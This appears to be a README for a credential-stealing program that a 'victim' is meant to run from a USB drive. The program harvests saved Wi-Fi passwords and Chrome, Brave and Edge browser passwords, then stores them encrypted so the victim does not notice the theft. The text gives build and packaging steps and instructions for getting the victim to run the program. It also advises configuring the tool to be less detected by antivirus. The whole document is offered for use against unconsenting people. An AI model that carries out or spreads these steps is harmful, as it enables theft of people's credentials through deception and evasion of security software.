A python program to copy all passwords from a victim pc to your pendrive
A person has to copy main_Windows/main_Linux software in his thumb drive and give it to a victim, when victim opens that program directly on his pendrive, the software grabs the credentials of wifi_passwords, Chrome, Brave, Edge saved passwords. The software save the passwords in .data file in pendrive. The text inside this file is encrypted so if bymistakely the victim opens this file he will not came to know that you have stolen his passwords.
First click on Code then click on Download ZIP (As Shown in image)
Extract the zip file and open the folder
Then open terminal and type pip install -r .\requirements.txt
if Windows - Then in terminal type pyinstaller --onefile .\main_Windows.py
if Linux - Then in terminal type pyinstaller --onefile .\main_Linux.py
Then in terminal type pyinstaller --onefile .\Decrypter.py
Then open dist folder then there you can see two file main_Windows/main_Linux and Decrypter
###########################################
Then copy the main_Windows/main_Linux file on your pendrive. And give it to the victim then the victim should somehow need to open main_Windows/main_Linux in his computer. When the victim returns back your pendrive then look for .data file and copy the file to the same folder where Decrypter is present then run the Decrypter And a new text file named Passwords.txt will appear and open that. And baam!!! you can see the passwords.
Before using pyinstaller to make executables ,change the source code as follows--
Open File setup.py and at the bottom where it is written if __name__="__main__":
then choose the options you want so that it could be less detected by antivirus